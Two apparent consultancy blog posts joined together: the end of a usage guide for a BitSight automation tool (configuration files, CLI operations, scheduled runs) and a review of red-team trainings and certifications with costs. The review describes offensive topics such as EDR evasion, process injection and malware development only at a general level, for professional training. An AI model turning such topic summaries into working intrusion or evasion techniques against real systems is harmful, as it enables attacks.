This file is the heart of the tool. It will be queried to retrieve entities for every operation.

An example of a group_mapper.json file can be found below.

      {"Group1": "Single Entity"},
      {"Cluster Group2": ["EntityOne", "EntityTwo", "EntityThree"]},
      {"Bigger Cluster Group3": [
        {"SubCluster": ["Entity1", "Entity2"]},
        {"SubCluster2": ["EntityUno", "EntityDos"]}
      "Random Entity that sits alone under the root"

The grouping subsidiaries can be organized like above. A few rules apply:

  • All of your subsidiaries must be under the “Root” subsidiary. The “Root” Subsidiary is your main subscription in BitSight that contains all the others (if any).
  • The Root subsidiary contains a list of other group subsidiaries or subsidiaries that are directly under the Root.
  • A Group or Group Cluster subsidiary can hold one, or more subsidiaries.
  • You can define bigger Cluster Group subsidiaries that contain even more group subsidiaries, which in turn can contain more subsidiaries.
  • You can create your own Group subsidiaries even if they don’t exist in BitSight for better structuring.
  • You can use your own naming conventions for all your subsidiaries and group subsidiaries without affecting BitSight or the retrieved information.

The guid_mapper.json file

This file is the tie between BitSight and the BitSight Automation Tool. This is where the magic happens where your naming conventions can relate back to specific subsidiaries within BitSight.

An example of a guid_mapper.json file can be found below.

    "Root": "463862495-ab29-32829-325829304823",
    "Group1": "463862495-ab29-32829-325829304824"

This structure is the most basic structure you can have. The only thing you have to do is to create a new line for each subsidiary and assign its GUID from BitSight.

Below you may find how to get the GUIDs for the subsidiaries. A few rules that apply:

  • The order doesn’t matter.
  • Make sure you use the exact naming convention you used on the group_mapper.json file. (It’s case sensitive)
  • Do not add any lists or other structures in this file. It should be one line for every subsidiary.
  • For groups you added in group_mapper.json file, that do not exist in BitSight, add a line like the following: “{your-group}”:”-“,

Configuring your Company’s structure

This step is mandatory for the tool to operate correctly. You can either use BitSight’s structure or you can create your own that suits best for your company.

Update Example
Figure 2: Update Example

The groups.conf file

Once you have completed the above steps, you need to modify one last item in the configuration of the tool.

The ‘groups.conf’ file structure should look like below (Figure 3)

Groups Modification
Figure 3: Groups Modification

You can add your groups one per line.

Note: Do not modify the first line. It should remain as is [Groups].

Letting BitSight Automation Tool handle the rest

You have completed the manual part of the configuration! Pretty simple, right?

Execute the tool with the update operation.

python update

This will go through Bitsight and find any subsidiaries that are missing. It will then prompt you to include it into the configuration. Follow the steps, provide the required information and the tool will take care of the rest.


PS C:\Users\Konstantinos Pap\Desktop\BitSight Automation> python .\ update

Subsidiary Name – GUID not found in our configuration

Would you like to include it (Y/N)? y
What is the name of this entity? Test
Under which group should this entity fall under({your-groups}) ? myTestGroup
Adding Subsidiary Name with guid {GUID} as Test in myTestGroup

Configuration Updated

Binding into Executable

Before we dive into how to utilize this tool, let’s first dive into how we can make an executable bundle for this tool. Performing this step allows for easier sharing and makes the tool usable by anyone, from analyst to CISO, without any specific requirements. We can use Pyinstaller to create the .exe standalone file.

  1. First, open a terminal
  2. Now, we need to install pyinstaller. Use the `pip install pyinstaller` command to download and install pyinstaller.
  3. Afterwards, navigate into the tool’s directory from within the terminal window.
  4. Execute the following command: “pyinstaller -p __pycache__ -F

Wait for a few seconds and notice there is a new directory created named “dist”. Grab the 2 .json files and the file and copy them into the dist directory. Zip the contents of that directory and distribute that bundle on any Windows system. It will execute without any need for dependencies.

Note: You still have to export the environment variables to the new machines in order for the tool to be able to connect to BitSight.


Now that we installed and fully configured BitSight, we can go ahead and use its capabilities. As we already mentioned before, the tool allows for 5 different operations + 2 supplementary to assist with the tool’s maintenance.

We’ll first have a look at the usage menu of the tool and then we’ll navigate over a breakdown of each operation and how it works with examples.


Invoke the tool with its –help attribute.

PS ~/> python .\ --help

usage: [-h] [-g {{your-groups}}] [-e ENTITY] [-v]
                              [-s {All,Critical-High,Critical,High,Low,Medium}]
                              [-so {alphanumerically,alphabetically}] [--search SEARCH] [--months MONTHS]

BitSight Automation tool to automate certain operations like historical report generation, findings categorization, asset list retrieval, reverse lookup of IP addresses and current ratings for entites

positional arguments:
                        The operation to perform.

optional arguments:
  -h, --help            show this help message and exit
  -g {{your-groups}}, --group {{your-groups}} The group of entities you want to query data for.
  -e ENTITY, --entity ENTITY A specific entity you want to query data for
  -v, --verbose         Increase output verbosity
  -s {All,Critical-High,Critical,High,Low,Medium}, --severity {All,Critical-High,Critical,High,Low,Medium}
                        Level of Severity to be captured
  -so {alphanumerically,alphabetically}, --sort {alphanumerically,alphabetically}
                        Sort rating results either alphanumerically or alphabetically.
  --search SEARCH       IP or Domain to reverse lookup for.
  --months MONTHS       Add in how many months back you want to view data for. If you want 1 year, fill in 12 months.
                        Max is 12

For any questions or feedback feel free to reach out to [email protected]

Use Cases

Now we will go through a breakdown of all different use cases within BitSight Automation Tool. We’ll go through the functional first and we’ll leave the last 2 complementary at the end.

For every operation different arguments will be required or not needed. The tool will let you know if you missed something during runtime. Example output:

[-] You need to specify one of the arguments --country or --region.

Functional Operation: Rating

Use the rating operation to retrieve the current score of an entity or group in order to confirm if it’s above or equal to your policies. If a group is supplied this operation will output all of the subsidiaries under the specified group in the order you specified them in the JSON files (You also have the option to sort them alphanumerically)

Let’s try to fetch the current rating for our “Test” subsidiary.

PS ~/> python .\ rating -e Test

Test - 790
[+] Data saved to: 2023-03-17_bitsight_rating_Test.txt

Our Test Subsidiary has a score of 790. That’s an advanced score, so we can cross-verify with the company’s policies and take further action if needed. The results are also saved as a TXT file to allow easy copy/paste if required.

We can do the same thing for our Group and retrieve all the scores from all subsidiaries under our “Test Group”.

PS ~/> python .\ rating -g “Test Group”

[*] This may take a moment. Grab a coffee
Working on Test Group...
Test Group – 660
EntityOne - 620
Test Entity 2 - 760
EntityTwo - 770
[+] Data saved to: 2023-03-17_bitsight_rating_Test Group.txt

Notice we have retrieved ratings for all subsidiaries under “Test Group” in addition with the rating of “Test Group”. Some additional notes:

  • If “Test Group” didn’t have a GUID then it will not pull any data for it.
  • You can change the sorting algorithm using the -so argument.
  • You can retrieve the rating of “Test Group” without having to go through its subsidiaries. To do so, you can treat it like a normal entity, supplying it with the -e argument instead.
  • If your group is a big cluster group containing more groups that contain more subsidiaries, the tool will recursively query Bitsight for all those groups and subsidiaries under the cluster group and its respective groups and subsidiaries. (In order words, nothing will be skipped)
  • You can use -g {Root} to retrieve ratings for all the subsidiaries in your company. (Replace {Root} with the name you have given it)

Functional Operation: Historical

Use the historical operation to set up an overview of ratings for a given subsidiary or group over a specified timeframe (maximum 12 months) to showcase in reports and review progress or regress. Typically this operation is used with the -g argument but you can also utilize the -e argument for a given subsidiary only.

Let’s try to generate a report for our previous “Test Group” and its subsidiaries for the past year.

PS ~/> python .\ historical -g “Test Group” --months 12

Grab a coffee, this will take a while...
Working on Test Group...
[+] Data saved to 2023-03-17_Test Group_bitsight_historical_ratings_12_months.xlsx

Note: This command might take some time depending on the size of your organization + the number of subsidiaries it has to query data for. In any case, it is verbose enough to let you know in which group it is working on each time, so if you supplied a big cluster group you would have real time output of the progress.

The report:

Historical Report
Figure 4: Historical Report

There is a legend in the second sheet (tab) of the Excel file that denotes what these colors are and their scores – aligned with BitSight’s ratings and color coding.

Historical Score Indication
Figure 5: Historical Score Indication

Note: You can generate these types of reports with no limitation to a number of subsidiaries. You can even generate it for the entire organization using the Root subsidiary.

Functional Operations: Findings

Use the findings operation to generate a filtered list of vulnerabilities for a subsidiary to remediate. This operation works solely with subsidiaries and not groups! You also need to supply the severity level with the -s argument.

Note: Your subsidiaries need to have a ‘Total Risk Monitoring’ subscription for this command to work. Otherwise it will produce an error.

Let’s retrieve the findings for our ‘EntityOne’ subsidiary under ‘Test Group’ we used earlier. We will retrieve the Critical vulnerabilities only.

PS ~/> Python .\ findings -e EntityOne -s Critical

[+] Data saved to bitsight_Critical_findings_EntityOne_2023-03-17.csv

Critical findings were downloaded and saved to a file called ‘bitsight_Critical_findings_EntityOne_2023-03-17.csv’. You can now start working on remediating the findings or assign it to the proper internal team.

Functional Operation: Assets

Use the assets operation to retrieve the asset count and asset list of a subsidiary in order to validate your public IP space. This operation works solely with subsidiaries and not groups. This is a two-step process of querying. The operation first queries BitSight to retrieve the total count of public IPs in your subsidiary and then queries for the detailed asset list.

Note: This command requires a ‘Total Risk Monitoring’ subscription. If one is not available this command will produce an error.

Let’s attempt to retrieve the asset list for our ‘EntityOne’ subsidiary from the previous examples.

PS ~/ > python .\ assets -e EntityOne

EntityOne - 1410
*********** Asset List ************
[+] Asset List saved to: bitsight_asset_list_EntityOne_2023-03-17.csv

Note: This command will only fetch assets that are correctly attributed to this subsidiary. There’s a difference between correctly attributed by BitSight and internal/private Tagging.

Functional Operation: Reverse Lookup

Use this command to investigate where an IP, IP Range, domain or domain wildcard is attributed to and what IPs or domains it is associated with. This command only requires the –search argument.

Let’s attempt to find out where our domain is attributed to and what public IPs it is associated with.

PS ~/> python .\ reverse_lookup --search - ['<Redacted XX.XXX.XX.XXX>']: Found in: EntityOne

Supplementary Operation: List

Use this operation to review the correlation between an entity’s custom given name and BitSight’s given name in a list for all defined entities. This command does not require any arguments.

Let’s view our subsidiaries and their correlation to BitSight.

PS ~/> Python .\ list

Listing Configuration...
Root – My Test BitSight Organization
Group One – First Group Subsidiary
EntityOne- Entity1 Test
Test Entity 2- Entity 2 Test
EntityTwo – SSEntity 2

Note: The mapping is {my JSON representation – BitSight’s representation}. The two names are bound over the GUID unique value for a subsidiary.

Supplementary Operation: Update

Use this operation to automatically update the tool and its respective JSON files. We already saw how this command works in the configuration section.

Task Scheduler / Cron Jobs

As we already mentioned, we can either manually execute the BitSight Automation Tool or we can set it up to automatically execute on its own recurringly over a specified window of time. This is relatively easy to achieve in both Linux and Windows operating systems.

Windows – Task Scheduler

To achieve this in Windows we need to utilize the Task Scheduler utility provided by Microsoft itself. No need to download or install any additional software. Let’s configure it.

  1. Open the Task Scheduler.
  2. On the top left, select “Task Scheduler Library“. (Figure 6)
Task Scheduler Library
Figure 6: Task Scheduler Library
  1. On the top right, select “Create Basic Task
Create Basic Task
Figure 7: Create Basic Task
  1. Write down a name and description like below:
Creating Basic Task
Figure 8: Creating Basic Task
  1. Then click “Next
  2. Select a Monthly Trigger and click Next
Selecting Interval
Figure 9: Selecting Interval
  1. Next, select the dates you wish to execute. I will select all months, and run on every 1st Monday of the Month and click Next.
Selecting TimeFrame
Figure 10: Selecting Timeframe
  1. Choose “Start a Program” and click Next.
Selecting Action
Figure 11: Selecting Action
  1. Browse to your bitsight_automation.exe file you created earlier for the “Program/Tool”field. For the arguments field supply “historical -g {your-group} –months XX” and replace {your-group} with the group you wish to execute for, and how many months back you want. (Remember it’s up to 12 months maximum). For the “Start in (Optional)” field add in the path to the executable. This is required here because the BitSight Automation Tool expects the JSON files in the same directory it is executing from. Finally click Next.
Configuring the Program and Arguments
Figure 12: Configuring the Program and Arguments.
  1. Verify all is correct and click on Finish.

Your Scheduled task is ready. You can manually invoke it once to verify it’s working correctly from the right bar, selecting ‘Run

Running the task
Figure 12: Run

Note: You can follow this procedure for other tasks as well. (Update excluded as it requires manual intervention. However, the shell or prompt that will open will be interactive, so you can issue update comments on a daily basis anyway and if there are any, you can interact with the tool.)

Linux – Cron Jobs

The same process can be setup for Linux as well using the Cron Jobs it offers.

Write the following new line into the “/etc/crontab” file and replace ‘{your-tool-directory}’ with your tool’s directory (i.e. /opt/bitsight):

10 9 1 * * kali cd {your-tool-directory} && Python historical -g Root –months 12

This will execute the tool every first of the month at 9:10 in the morning.


While executing this tool you might run into some issues here and there. This section will go over the 2 most common notifications you might encounter while using BitSight Automation.

Total Risk Monitoring Subscription Required

You may have noticed in the Execution section of a couple of operations a note saying “This operation requires a ‘Total Risk Monitoring’ subscription to work. Otherwise it will produce an error”. These types of errors are usually encountered in Findings and Assets operations. The output will look something like this.

If we remove the ‘Total Risk Monitoring’ subscription from EntityOne and execute the findings operation on it again, we will run into the following error:

PS ~/> Python .\ findings -c EntityOne -s Critical

It appears as there are no findings in EntityOne or there is something wrong with the API. Please validate the old fashioned way using your browser.
More Details: list index out of range
It might be the case you do not have a 'Total Risk Monitoring' subscription. The 'Risk Monitoring' subscription is unable to work with the API for this operation

Response: {'links': {'next': None, 'previous': None}, 'count': 0, 'results': []}

File not Found *.JSON

In case you execute the tool and it reports back with “File not found” it means that somehow the necessary files were deleted. In order to resolve this issue you need to create the files again with the text “{}”inside them.

PS ~/> Python .\ findings -c EntityOne -s Critical

File not found:  'group_mapper.json'. Please copy the  'group_mapper.json' to the same directory as this tool and try again.


This blogpost presented the BitSight Automation Tool as a valuable enhancement for organizations employing BitSight for performing external assessment and reducing exposure, as their solution.

Some key perks of this tool are as follow:

  1. Automates a lot of operations that otherwise are time consuming.
    1. Rating -> Retrieve the current score of an entity and confirm it’s above or equal to your company’s required security policies or digital mandate.
    2. Findings -> Generate a filtered list of vulnerabilities for an entity to remediate.
    3. Assets -> Retrieve the asset count and asset list of an entity, to validate your public IP space.
    4. Reverse Lookup -> Investigate where an IP, IP Range, domain or domain wildcard is attributed to and what IPs or domains it is associated with.
    5. Historical Ratings -> Sets up an overview of ratings for a given entity or group over a specified timeframe (maximum 1 year) to showcase in reports and review progress or regress.
  2. Allows the possibility to configure scheduled executions of the tool and create monthly/daily/yearly reports per your needs.
  3. Provides an easy to use command interface. It can also be compiled as an executable version to avoid having to install dependencies and to make it usable by anyone. (From analysts to CISO.)
Konstantinos Papanagnou

Konstantinos Papanagnou

Konstantinos is a Senior Cybersecurity Consultant at NVISO Security.

With a background in software engineering, he has an extensive set of skills in coding which helps him in day-to-day operations even in the Cybersecurity area. His motto; “Better spend 5 hours debugging your automation, than 5 minutes performing an automatable task”.

Unlocking the power of Red Teaming: An overview of trainings and certifications

Title Image

NVISO enjoys an excellent working relationship with SANS and has been involved as Instructors and Course Authors for a variety of their courses:

As technology continues to evolve, so do the tactics and techniques used by cyber criminals. This means that staying up to date as a red team operator is crucial for protecting customers against the constantly changing threat landscape. Red team operators are tasked with simulating real-world attacks on a customer’s system to identify weaknesses and vulnerabilities before they can be exploited by malicious actors. By staying informed about the latest attack methods and trends, red team operators can provide more effective and relevant testing that accurately reflects the current threat landscape. Additionally, keeping up with emerging technologies and security measures can help red team operators develop new tactics and strategies to better protect customers from potential cyberattacks.

While red teams are primarily responsible for simulating attacks and identifying vulnerabilities, blue teams play a critical role in defending against these attacks and protecting an organization’s assets. Attending trainings that are typically attended by red teams can provide valuable insights and knowledge that blue teams can use to better defend their organization. By understanding the latest attack methods and techniques, blue teams can develop more effective defense strategies, identify potential vulnerabilities and patch them before they can be exploited by attackers. Additionally, attending these trainings can help blue teams better understand the tactics and tools used by red teams, allowing for more effective collaboration and communication between the two teams. Overall, attending red team training can help blue teams stay informed and prepared to defend against the constantly evolving threat landscape.


If you do not have much time at hand, do not worry, the following tables may provide you a quick overview:

Certification NameBeginnerIntermediateExpert
Red Team Ops (CRTO1)🔑
Red Team Ops II (CRTO2)🔑
Certified Red Team Professional (CRTP)🔑
Certified Red Team Expert (CRTE)🔑
Certified Red Team Master (CRTM)🔑
Certified Az Red Team Professional (CARTP)🔑
Training NameBeginnerIntermediateExpert
Malware on Steroids🔑
Red Team Operations and Adversary Emulation (SEC565)🔑
Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection (SEC699)🔑
RED TEAM Operator: Malware Development Essentials Course🔑
RED TEAM Operator: Malware Development Intermediate Course🔑
RED TEAM Operator: Malware Development Advanced – Vol.1🔑
Corelan “BOOTCAMP” – stack exploitation🔑


It is important to note that the certifications and trainings included in the review are not an exhaustive list of all the options available and are not in a specific order.
While the ones highlighted in the review are all excellent and worth considering, there may be other certifications and trainings that could also be beneficial for your specific needs and goals.
It is always essential to do your own research and carefully consider your options before deciding. Ultimately, the best certification or training for you will depend on your individual circumstances, interests, and career aspirations.


Red Team Ops – CRTO1

The Red Team Ops 1 course is a very well done certification that teaches you the basic red team operator principles, adds handy tools for the beginning and shows techniques you will use as a red team operator.

You will learn how to start and configure the team server (in the course of the certification Cobalt Strike from FORTRA) as well as how to manage the listeners and touch the base of payload generation.

The certification is a must for beginners who want to learn how to go from the initial compromise, to moving laterally and in the end take over the whole domain.

Of course, Microsoft Defender (not Defender ATP/MDE), application whitelisting are also part of the course to prepare you for the much-needed evasion in the customer environments by using the artifact and resource kit available with Cobalt Strike.

Who should take this course?

If you are new to the game, this course is made for you! If you already have infrastructure security assessment experience, this course adds new attack paths to your inventory and includes some important tips for OPSEC which is a lot different in red team engagements to what you are known from an internal security assessment, where stealth is optional.

I enjoyed the exam a lot and in comparison to the price of SANS certifications, this is also a great opportunity for someone with a tighter budget, thanks Zeropoint Security!

Associated costs

365 GBP = 415,32 EUR = 452,89 USD (as of 04/04/2023)

The price includes the course materials as well as a voucher for the first exam attempt.

The RTO lab is sold as a subscription to those who have purchased the course.

The price is 20/40/60 GBP per month for 40/80/120 hours of runtime respectively.

Red Team Ops II – CRTO2

The Red Team Ops 2 course aims to build on the foundation of the Red Team Ops course in order to help you improve your OPSEC skills and show you ways to bypass more defense mechanisms.

Important to note here is, that this course is NOT a newer version or replacement of the first course.

The course will introduce the concept of public redirectors and rewrite rules to you, which can then be applied in the wild.

To help you understand the evasion techniques, some common Windows APIs are being covered as well as P/Invoke and D/Invoke which allow you to dynamically invoke unmanaged code and avoid API hooks.

Other indicators such as RWX memory regions and suspicious command lines will be treated with PPID and Command Line Spoofing.

Since Microsoft upped their game for security quite a bit, the Attack Surface Reduction should not be missed out on and as such is also included in this course with examples of how to bypass a subset of the default rules.

If you have struggled with Applocker in the past, welcome to the game. The bigger brother “Windows Defender Application Control (WDAC)” is waiting for you and allows the blue team to even better protect the environment.

The cherry on top of the course is the chapter treating different types of EDR hooks, syscalls and how to integrate goodies into the artifact kit.

Who should take this course?

If you already have completed the Red Team Ops 1 course this is a great addition to extend the knowledge gathered in the first round. In more mature environments you will face WDAC, EDRs from different providers and better blue team responses. Similar to the first course the price is very attractive and the hands-on experience in a lab and not just on paper is worth every dime.

If you think you already cover the first course with your knowledge, you can also jump to this one directly. The exam can cover parts of the first course to allow reconnaissance and privilege escalation/lateral movement, so I would not recommend going for CRTO2 without prior red teaming knowledge.

Associated costs

399 GBP = 453,86 EUR = 495,07 USD (as of 04/04/2023)

The price includes the course materials as well as a voucher for the first exam attempt.

The RTO II lab is sold as a subscription to those who have purchased the course.

The price is 15 GBP per month for 40 hours of runtime.

Certified Red Team Professional (CRTP)

The Certified Red Team Professional (CRTP) course provides you with a hands-on lab environment with multiple domains and forests to understand and practice cross trust attacks. This allows you to learn and understand the core concepts of well-known Windows and Active Directory attacks which are being used by threat actors around the globe.

Windows tools like PowerShell and others off the shelf features are being used for attacks to try scripts, tools and new attacks in a fully functional AD environment.

At the time of this blog post, the lab makes use of Microsoft Windows Server 2022 and SQL Server 2017 machines.

Lab environment (AD Attacks Lab (CRTP) (

Who should take this course?

If you are new to topics like Active Directory enumeration, how to map trusts of different domain, escalate privileges via domain attacks or Kerberos-based attacks like golden and silver tickets, this course is a good bet.

Additionally, the SQL server trusts and defenses as well as bypasses of defenses are covered.

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 249 USD ~ 227,58 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 379 USD ~ 346,40 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 499 USD ~ 456,08 EUR (as of 05/04/2023)

The course mentions the following content:

23 Learning Objectives, 59 Tasks, >120 Hours of Torture

Please keep in mind, that the certificate has an expiry time of three years and then needs to be renewed.

Certified Red Team Expert (CRTE)

After completing the Certified Red Team Professional (CRTP) you might be looking to explore more of Microsoft features that can be implemented in customer environments. This course will allow you to play with the Local Administrator Password Solution (LAPS), Group managed service accounts (gMSA) and the Active Directory Certificate Service (AD CS).

As customers often have resources in the cloud as well, Azure AD Integration (Hybrid Identity) and the attack paths therefore are presented in this course as well.

The person taking the course will learn to understand implemented defenses and how to bypass, for example: Just Enough Administration (JEA), Privileged Access Workstations (PAWs), Local Administrator Password Solution (LAPS), Selective Authentication, Deception, App Allowlisting, Microsoft Defender for Identity and more.

Lab environment (Windows Red Team Lab (CRTE) (

Who should take this course?

If you feel ready to dive into the more advanced defense mechanisms mentioned above, this course will certainly help you to identify these in an environment and navigate in a more mature environment covertly.

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 299 USD ~ 273,28 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 499 USD ~ 456,08 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 699 USD ~ 638,87 EUR (as of 05/04/2023)

The course mentions the following content:

28 Learning Objectives, 62 Tasks, >300 Hours of Torture

Please keep in mind, that the certificate has an expiry time of three years and then needs to be renewed.

Certified Red Team Master (CRTM)

The goal of this course is to compromise multiple forests with a minimal footprint, while gaining full control over the starting/home forest.

As consulting is more than just attacking infrastructure, the course also includes the submission of a report that contains details of attacks on target forests and details of security controls/best practices implemented on the starting/home forest.

Lab environment (Global Central Bank (CRTM) (

Who should take this course?

I would suggest this course if you want to put your technical knowledge to the test while also taking a step behind the lines of a blue team, as you need to document details of the security controls in place and how they could be mitigated best. This will help you to grow in the long term and make it possible to think like a defender in order to improve your evasion techniques.

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 399 USD ~ 364,68 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 599 USD ~ 547,47 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 749 USD ~ 684,57 EUR (as of 05/04/2023)

The course mentions the following content:

46 Challenges and >450 Hours of Torture

Please keep in mind, that the certificate has an expiry time of three years and then needs to be renewed.

Certified Az Red Team Professional (CARTP)

The Azure Active Directory is nowadays often used as an Identity and Access Management platform using the hybrid cloud model. It also allows on-prem Active Directory applications and infrastructure to be connected to the Azure AD. This step brings some very interesting opportunities to the plate, but with these also risks.

When talking about red teaming and penetration testing, these risks can be mapped onto the following phases: Discovery, Initial access, Enumeration, Privilege Escalation, Lateral Movement, Persistence and Data exfiltration. All of these phases are covered in the course. The most value for the customers results from not just identifying and abusing vulnerabilities in the environment, but also making clear suggestions for mitigations that can be implemented in the short or long term in the customer environment.

Lab environment (Attacking & Defending Azure AD Lab (CARTP) (

Who should take this course?

If you are a security professional trying to strengthen your skills in Azure cloud security, Azure Penetration testing or Red teaming in Azure environments, this is the right course for you!

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 449 USD ~ 410,38 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 649 USD ~ 593,17 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 849 USD ~ 775,97 EUR (as of 05/04/2023)

The course mentions the following content:

26 Learning Objectives, 77 tasks, 7 Live Azure Tenants, >140 hours of fun!

Please keep in mind, that the certificate has an expiry time of three years and then needs to be renewed.


Malware on Steroids

The course is dedicated to building your own C2 Infrastructure and Payload. To achieve that, an introduction towards Windows Internals which is followed by a full hands-on experience on building your own Command & Control architecture with different types of Initial Access payloads and their lifecycle such initial access, in-memory evasions, different types of payload injections including but not limited to reflective DLLs, shellcode injection, COFF injections and more, is being offered.

The course is offered in a time span of 4 days with 6-7 hours per day in an online interactive environment.

Lab environment (Dark Vortex (

Who should take this training?

If you always wanted to write your own C2 and create a dropper and stagers in x64 Assembly, C this course is perfect for you. Please keep in mind, that fundamental knowledge of programming with C/C++/Python3 and the familiarity with programming concepts such as pointers, references, addresses, data structures, threads and processes is listed as a requirement.

Associated costs

2,500 USD ~ 2281,95 EUR (as of 05/05/2023)

The price includes a certificate of completion, all the training materials including course PDFs/slides, content materials, source code for payloads and a python3 C2 built during the training program.

SEC565: Red Team Operations and Adversary Emulation

The SEC565 is one of the courses where you get to not only improve your technical abilities to abuse vulnerabilities, but also improve your skills around the whole engagement from planning to making sure the work you deliver follows a high quality and the best benefit for the customers.

The focus of the course is to learn how to plan and execute end-to-end Red Teaming engagements that leverage adversary emulation, including the skills to organize a Red Team, consume threat intelligence to map against adversary tactics, techniques, and procedures (TTPs), emulate those TTPs, report and analyze the results of the Red Team engagement, and ultimately improve the overall security posture of the organization.

The in person course is 6 days long for a reason. From planning the emulation to infrastructure and learning about initial access and persistence, the active directory attacks and ways to move from one compromised host to another is also included. As a red team documenting the abused vulnerabilities and obtaining the requested objectives is very important and therefore has a dedicated time slot as well.

The last block will contain a capture the flag red team lab consisting of 3 domains which includes Windows servers, workstations and databases as well as the active directory infrastructure to test the skills you learned earlier.

Who should take this course?

Defensive security professionals to better understand how Red Team engagements can improve their ability to defend by better understanding offensive methodologies, tools, tactics, techniques, and procedures.

Offensive security professionals looking to improve their craft and also improve their methodology around the technical part of the engagement (adversary emulation plan, safe sensitive data exfiltration, planning for retesting and more).

Associated costs

The course is being offered On-Demand (Online) and In Person.

The On Demand course is 8,275 USD ~ 7534.24 EUR (as of 02/05/2023)

The In Person course is priced at 7,695 EUR + OnDemand Bundle (785 EUR) = 8,480€ (as of 02/05/2023)

SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection

The SEC699 is one of the more unique courses where you get detailed insights into both red & blue team.

The course contents have been created by both blue teamers and red teamers and that is reflected in the detail of the course material.

The focus of the course is to learn how to emulate threat actors in a realistic enterprise environment and how to detect those actions.

As a proper purple teaming needs to follow a proper process, suitable tooling and planning, the course makes sure that these important parts are not missing. In-depth techniques such as Kerberos Delegation attacks, Attack Surface Reduction / AppLocker bypasses, AMSI, Process Injection, COM Object Hijacking and many more are being executed during the course and in order to grow on the challenge you will build SIGMA rules to detect these techniques.

Who should take this course?

Defensive security professionals looking to gain insights in the actual operation of carrying out attacks to understand the perspective of an attacker: Which tools are being used? What does a C2 setup look like? How does an attacker communicate with the C2 infrastructure? How can I use automation to my advantage?

Offensive security professionals looking to gain insights in logging & monitoring, which footprint and events are being generated using specific techniques and how the operational security can be improved to stay stealthier.

Associated costs

The course is being offered On-Demand (Online) and In Person.

The On Demand course is 7,785 USD ~ 7148.73 EUR (as of 04/04/2023)

The In Person course is priced at 7,170 EUR + OnDemand Bundle (785 EUR) = 7,955€ (as of 04/04/2023)

RED TEAM Operator: Malware Development Essentials

Malware, similar to software you use every day, has to be developed, and this course guides you through it.

Starting with what malware development is and how PE files are being structured, it helps you to understand how to encode and encrypt your payloads as well as how to store them inside a PE file.

Remote process injection as well as using an existing binary to backdoor is also being explained with hands-on code examples to follow and customize.

Who should take this training?

If you are getting started with developing your own loaders and stagers, this course is awesome to get the fundamentals right and gives you customizable source code that you can improve and build upon.

Associated costs

199 USD ~ 181,64 EUR (as of 05/04/2023)

A virtual machine with a complete environment for developing and testing your software, and a set of source code templates are included in the price.

RED TEAM Operator: Malware Development Intermediate

After the course “RED TEAM Operator: Malware Development Essentials” you might be wondering where to go next. This course uses the build foundation to extend the tooling with more code injection techniques, how you can build your own custom reflective binary as well as how to hook APIs in memory to monitor or evade functions.

Sooner or later, you have to migrate between processes that have loaded your shellcode so the section on how to migrate between 32- and 64-bit processes comes to the rescue. Finally, the course guides you on how to use IPC to control your payloads.

Who should take this training?

If you completed the course “RED TEAM Operator: Malware Development Essentials” and you are ready to take your skills to the next level, this course helps you to extend the kit you built in the first course.

Associated costs

229 USD ~ 209,03 EUR (as of 05/04/2023)

A virtual machine with a complete environment for developing and testing your software, and a set of source code templates are included in the price.

RED TEAM Operator: Malware Development Advanced – Vol.1

As the name of the course suggests, after the essentials and the intermediate course, the advanced course will teach you how to enumerate processes the modules and handles in order to identify a suitable process for injection. Payloads can not only be hidden in PE files and, as such, the course covers how to hide payloads in different parts of the NTFS, in the registry and in memory.

It demonstrates how any API (with any number of params) in a remote process can be called by using a custom “RPC” and how exception handlers can be abused.

You will learn how to build, parse, load and execute COFF objects in memory and much more.

Who should take this training?

After completing the Essentials and Intermediate course of the malware development series of Sektor7, I can only recommend this training to further strengthen your knowledge of how the Windows internals work and give you ideas for how to exploit them in the future.

Associated costs

239 USD ~ 218,15 EUR (as of 05/04/2023)

A virtual machine with a complete environment for developing and testing your software, and a set of source code templates are included in the price.

Corelan “BOOTCAMP” – stack exploitation

One thing to start with, the 2021 edition of the course is based on Windows 10/11 and contains an introduction to x64 stack-based exploitation in case you care for up-to-date material and operating systems.

Although the training is based on Windows 10/11, you have to start with the fundamentals by explaining the basics of stack buffer overflows and exploit writing.

The training provides you with a solid understanding of current stack-based exploitation techniques and memory protection bypass techniques. The training provider mentions that the course material is kept updated with current techniques, previously undocumented tricks and techniques, and details about research that was performed by the training author.

A small excerpt of the training contents:

  • The x86 environment
  • Stack Buffer Overflows
  • Egg hunters
  • ASLR
  • DEP
  • Intro to x64 stack-based exploitation

Who should take this training?

If you do like challenges, this training is for you. Anyone interested in exploit development or analysis is the target audience of this training.

The training itself does not provide solutions for any of the exercises that you will work through but instead provides help either during the course or after the course (via the student-only support system).

Associated costs

The In-Person training is listed at 2,500 EUR + 525 EUR VAT.

At the time of 05/04/2023 this is equal to 2738,89 USD + 575,17 USD VAT.

The path I chose to walk on

I started as a penetration tester / security consultant with a lot of self gained knowledge from home projects ranging from active directory setups at home to self built network attached storage and this helped me to have a good base with how to debug problems and general operating system usage.

During my security consulting path I then chose to start with the Offensive Security Certified Professional (OSCP) certification as this allowed me to understand some basic exploitation techniques and also get in contact with report writing and evidence collection.

Then there was a slight change in paths for dedicating my life to mobile security, but I always kept an eye on infrastructure security and did some projects in the mix.

After some years in the field, I knew I wanted a new challenge and decided to complete my CRTO1 certification.

I approached NVISO and after joining and the first larger projects I was hungry for more and completed my CRTO2 certification.

There are so many more trainings I have on my list, so keep it coming!

Education at NVISO

ARES assembles highly skilled expert professionals. This pool consists of people having 5+ years of experience in penetration testing and red team exercises, as well as blue team experts with knowledge on threat hunting and SOC operations.

The ARES team together currently holds the following certifications:

  • CRTO1 / CRTO2
  • eCPPTv2 / eWPTXv2

